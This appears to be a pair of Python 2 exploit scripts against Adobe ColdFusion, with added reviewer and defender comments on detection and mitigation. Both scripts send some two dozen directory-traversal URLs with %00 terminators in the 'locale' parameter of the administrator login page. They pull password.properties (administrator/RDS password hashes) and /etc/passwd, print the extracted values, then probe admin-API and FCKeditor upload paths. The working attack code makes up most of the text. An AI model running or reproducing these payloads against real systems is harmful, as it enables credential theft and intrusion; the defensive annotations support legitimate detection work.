#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Python 2 probe for a directory-traversal weakness in the ColdFusion
# administrator login page. Every request in `run` targets
# /CFIDE/administrator/enter.cfm and places `..` sequences plus a %00
# terminator in the `locale` query parameter; `scanner` then checks which
# /CFIDE admin-API pages answer at all.
#
# NOTE(review): the line structure of this listing was lost on the page. The
# indentation below is reconstructed from syntax; every token is unchanged.
#
# Defender view:
#   * Detection: access-log entries for /CFIDE/administrator/enter.cfm whose
#     `locale` value contains `..` or `%00`, followed by a short burst of GETs
#     for /CFIDE/adminapi/_datasource/*.cfm from the same client.
#   * Response: if such a request returned properties content, treat the
#     administrator/RDS password as exposed and rotate it.
#   * Mitigation: apply the vendor's ColdFusion security updates and keep
#     /CFIDE/administrator and /CFIDE/adminapi unreachable from untrusted
#     networks.
import sys
import threading
import urllib
import httplib

class Mythread(threading.Thread):
    """Thread that runs the traversal probe and then the admin-path scan.

    `host` is used as a URL prefix (scheme included) by `run` and as a
    scheme-stripped connection target by `scanner`.
    """
    def __init__(self,host):
        threading.Thread.__init__(self)
        self.host = host
    def run(self):
        """Request each traversal URL and print what the page title reflects.

        The list below differs only in traversal depth and in the assumed
        install layout (ColdFusion8, CFusionMX, CFusionMX7, JRun4) or target
        file (password.properties, etc/passwd).
        """
        urls = ['/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\lib\password.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\lib\password.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\lib\password.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\lib\password.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\lib\password.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\lib\password.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\lib\password.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\etc\passwd%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\etc\passwd%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\etc\passwd%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\etc\passwd%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\etc\passwd%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\etc\passwd%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\etc\passwd%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\..\etc\passwd%00en',
                '/CFIDE/administrator/enter.cfm?locale=..\..\etc\passwd%00en']
        try:
            for path in urls:
                # Keeps only the text between <title> and </title>, then
                # turns the 'rdspassword=' and 'encrypted=true' markers into
                # newlines before printing. No headers are set on this call,
                # so presumably the urllib default User-Agent is sent.
                out = urllib.urlopen(self.host + path).read().split(r'</title>')[0].split(r'<title>')[1].replace(r'rdspassword=', '\n').replace(r'encrypted=true', '\n')
                print out
        except Exception:
            # The try wraps the whole loop, so the first failure ends it.
            # A response without '<title>' raises IndexError and lands here
            # too, despite the connection-flavoured message.
            print "Error connect time"
        # NOTE(review): placement after the try/except (rather than inside the
        # handler) is inferred; the original indentation is not recoverable.
        self.scanner()
    def scanner(self):
        """GET each admin/API path and print those answering 200, 500 or 403."""
        #self.host = host
        cfmfck = ['/CFIDE/adminapi/_datasource/formatjdbcurl.cfm',
                  '/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm',
                  '/CFIDE/adminapi/_datasource/geturldefaults.cfm',
                  '/CFIDE/adminapi/_datasource/setdsn.cfm',
                  '/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm',
                  '/CFIDE/adminapi/_datasource/setsldatasource.cfm',
                  '/CFIDE/adminapi/customtags/l10n.cfm',
                  '/CFIDE/debug/cf_debugFr.cfm',
                  '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm']
        # Fixed request headers; the User-Agent string is constant across
        # every request of this scan, which makes it a (weak) log indicator.
        i_headers = {"User-Agent":
                     "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5","Accept": "text/plain"}
        for fckpath in cfmfck:
            # The scheme prefix is stripped because httplib expects host[:port].
            # A new connection is opened per path and never closed here.
            if self.host[0:8] == "https://":
                conn = httplib.HTTPSConnection(self.host.replace("https://",""))
            else:
                conn = httplib.HTTPConnection(self.host.replace("http://",""))
            conn.request('GET',fckpath,headers = i_headers)
            r1 = conn.getresponse()
            # Any other status code is silently skipped.
            if r1.status == 200 or r1.status == 500 or r1.status == 403:
                print self.host + fckpath + " " + str(r1.status)

if __name__ == "__main__":
    # Single worker thread; the target prefix comes from the first CLI argument.
    Mythread(sys.argv[1]).start()
#!/usr/bin/env python
# -*- coding: utf8 -*-
# Second, thread-less Python 2 variant of the same probe: it requests
# /CFIDE/administrator/enter.cfm with `..` sequences and a %00 terminator in
# the `locale` parameter, then checks a list of /CFIDE admin-API pages.
#
# NOTE(review): the line structure of this listing was lost on the page. The
# indentation below is reconstructed from syntax; every token is unchanged,
# and the banner string is kept exactly as it appears on the page.
#
# Defender view:
#   * Detection: access-log entries for /CFIDE/administrator/enter.cfm whose
#     `locale` value contains `..` or `%00`; in this variant the follow-up
#     requests carry a doubled leading slash (//CFIDE/...).
#   * Mitigation: apply the vendor's ColdFusion security updates and keep
#     /CFIDE/administrator and /CFIDE/adminapi unreachable from untrusted
#     networks; rotate the administrator password if properties content was
#     returned.
import sys , urllib , httplib , subprocess  # subprocess is not used below

def banner():
    """Print the tool's usage banner."""
    print """ #--------------------------------------------------# # Welcome to www.90sec.org # # THis is read ColdFusion sha1 Tool # # python COldFusion.py www.WebSite.cn # #--------------------------------------------------# """

# Traversal variants: same endpoint and parameter, differing only in depth and
# in the assumed install layout or target file.
urls = ['/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\lib\password.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\lib\password.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\lib\password.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\lib\password.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\lib\password.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\lib\password.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\lib\password.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\etc\passwd%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\etc\passwd%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\etc\passwd%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\etc\passwd%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\etc\passwd%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\etc\passwd%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\etc\passwd%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\..\etc\passwd%00en',
        '/CFIDE/administrator/enter.cfm?locale=..\..\etc\passwd%00en']
# Admin/API pages whose mere reachability is reported in the second phase.
cfmfck = ['/CFIDE/adminapi/_datasource/formatjdbcurl.cfm','/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm','/CFIDE/adminapi/_datasource/geturldefaults.cfm','/CFIDE/adminapi/_datasource/setdsn.cfm','/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm','/CFIDE/adminapi/_datasource/setsldatasource.cfm','/CFIDE/adminapi/customtags/l10n.cfm','/CFIDE/debug/cf_debugFr.cfm','/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm']

try:
    host = sys.argv[1]
    # Compares an int with the string '0'. In CPython 2 an int always orders
    # before a str, so this condition is always true and the banner prints on
    # every run.
    if len(host) < '0':
        banner()
    # NOTE(review): this loop is placed at try level, not under the `if`;
    # the original nesting is not recoverable from the page.
    for url in urls:
        context = urllib.urlopen(host + url).read()
        # Keeps only the text between <title> and </title>, then turns the
        # 'rdspassword=' and 'encrypted=true' markers into newlines.
        out = context.split(r'</title>')[0].split(r'<title>')[1].replace(r'rdspassword=', '\n').replace(r'encrypted=true', '\n')
        print out
except Exception:
    # Any failure (missing argument, connection error, or a response without
    # '<title>') prints the banner and exits; the scan below is then skipped.
    banner()
    sys.exit()
else:
    # Runs only when every request in the try block completed without raising.
    for line in cfmfck:
        # Only an "http://" prefix is stripped and HTTPConnection is always
        # used, so this variant has no HTTPS handling.
        host = host.replace("http://","")
        line = line.replace("\n","")
        # Entries in cfmfck already start with '/', so the requested path
        # begins with '//'.
        line = "/" + line
        website = host + line
        connection = httplib.HTTPConnection(host)
        connection.request("GET",line)
        response = connection.getresponse()
        # Only 200, 403 and 500 are reported; other statuses print nothing.
        if response.status == 200:
            print website , '200'
        elif response.status == 403:
            print website , '403'
        elif response.status == 500:
            print website , 'server ERROR'